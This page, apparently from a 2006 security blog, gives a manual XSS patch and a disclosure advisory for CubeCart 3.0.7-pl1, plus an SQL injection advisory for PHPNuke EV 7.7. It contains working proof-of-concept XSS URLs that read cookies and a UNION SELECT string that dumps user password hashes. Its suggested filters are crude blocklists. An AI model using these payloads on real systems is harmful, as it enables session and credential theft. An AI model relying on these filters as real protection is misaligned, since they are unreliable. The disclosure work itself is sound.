MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1

Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################

1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################

open includes/functions.inc.php look this code :

arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}
---------------------------------------------------------

if you have a diferen code like this , replace for this...

#########################################
2- index.php param 'act' and 'searchStr'
#########################################

open index.php at line 90 you have this for 'act' param:

------------------------------
if(isset($_GET['act'])){
switch ($_GET['act']) {

-----------------------------------------

you can change for this:

-------------------------------------------

$_GET['act'] = treatGet($_GET['act']);
if(isset($_GET['act'])){
switch ($_GET['act']) {
---------------------------------------------------

open index.php at line 80 you have this for 'searchStr' param

-----------------------------------------------------

if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
-------------------------------------------------------

you can change for this other:

--------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
--------------------------------------------------

#######################################################
3- fix 'catId' param includes/content/viewCat.inc.php
#######################################################

for fix 'catId' param open includes/content/viewCat.inc.php

found this code at line 50:

--------------------------------------------------
if(isset($_GET['catId'])) {

----------------------------------------

change for this other:
-----------------------------------------

$_GET['catId'] = treatGet($_GET['catId']);
if(isset($_GET['catId'])) {

-----------------------------------------

###################################################
4 fix 'productId' param includes/content/viewProd.inc.php
####################################################

at line 38 you have :

--------------------------------------------------

// query database
$query = "SELECT productId, productCode, quantity, name, description, image,

-----------------------------------------------------------------

you can change forr this other

------------------------------------------------------
// query database
$_GET['productId'] = treatGet($_GET['productId']);
$query = "SELECT productId, productCode, quantity, name, description, image,

---------------------------------------------------------------------

##############################################
5- cart.php fix params 'act' and 'searchStr'
##############################################

open cart.php for fix 'act' param look at line you have this code:

-------------------------------------------
// START MAIN CONTENT
switch ($_GET['act']) {
--------------------------------------------

replace for this other:

---------------------------------------------

// START MAIN CONTENT
$_GET['act'] = treatGet($_GET['act']);
switch ($_GET['act']) {
----------------------------------------------

arround line 69 you have :
--------------------------------
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",$_GET['searchStr']);

------------------------------------------

you can change for:

------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
---------------------------------------------

#######################################################
6- fix param 'docId' includes/content/viewDoc.inc.php
#######################################################

insert this line at line 36:
--------------------------------------
$_GET['docId'] = treatGet($_GET['docId']);
------------------------------------------

#######################################################
7- fix 'act' , 'username' ,'password','remember' and
'redir' params in includes/content/login.inc.php
#######################################################

inser this line at line 35:
---------------------------------------------------------

$_GET['act'] = treatGet($_GET['act']); $_POST['username'] = treatGet($_POST['username']);
$_POST['password'] = treatGet($_POST['password']);
-----------------------------------------------------------

for fix 'redir' param look and insert this line after line 52:

---------------------------------------------
//"login","reg","unsubscribe","forgotPass"
$_GET['redir'] = treatGet($_GET['redir']);
-------------------------------------------------------------

for fix 'remember' param inser this code at line 52:

---------------------------------------------

$_POST['remember'] = treatGet($_POST['remember']);

-------------------------------------------------


######################################
8-fix 'productId' and $_POST
includes/content/tellafriend.inc.php
######################################

open includes/content/tellafriend.inc.php

add this line after line 35 for fix 'productId' param :

------------------------------

// query database
$_GET['productId'] = treatGet($_GET['productId']) ;

-------------------------------------------------------

fix XSS in all boxes wen post,
arround line 58 you have this:

$text = sprintf($lang['front']['tellafriend']['email_body'],$_POST['recipName'],stripslashes($_POST['message']),$GLOBALS['storeURL'],$_GET['productId'],$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);



you can change for this other:
----------------------------------------------------

$text = sprintf($lang['front']['tellafriend']['email_body'],treatGet($_POST['recipName']),stripslashes(treatGet($_POST['message'])),$GLOBALS['storeURL'],treatGet($_GET['productId']),$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);

------------------------------------------------------

##########################
9- THANKS
##########################

I want to thank to all those that belive in my.
To OSVDB (http://www.osvdb.org) by its exelente work.
To All Manglers and Moderators of osvdb they belive in this project and they work for it :)))
To Secunia (http://www.secunia.com) by his verificacion and publication and pursuit of my work ,to Securityfocus (http://www.securityfocus.com)
like a all those that you preocupate of which my work is distributed by different means.
thanks to all those that stays there and all those that no longer stays.

CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting

Tuesday, January 10, 2006
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################

I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:

http://www.bindshell.net/papers/xssv.html

CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.

###############
VERSIONS
###############

CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too

#################
Timeline
#################

Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006

###############
Examples:
###############


http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E


http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go

http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat

http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>

#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>

#############
SOLUTION
#############

no solution was available at this time

currently i found a posible fix :

see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html

or

http://bugs.cubecart.com/?do=details&id=459


##################### €nd ########################

Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

PHPNuke EV 7.7 'search' module 'query' variable SQL injection

Monday, January 09, 2006
###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################

PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

PHPNuke EV 7.7 -R1

posible prior versions are afected.

##################
solution:
###################

No solution at this time!!!

A posible fix:

Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------

you can add this other :

------------------------------------

if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit


####################
Timeline
####################

discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006

###################
example:
###################

go to
http://[Victim]/modules.php?name=Search

and write in the search box this proof

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

all users hashes are available to view..

#################### €nd ########################

Thnx to estrella to be my ligth


--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...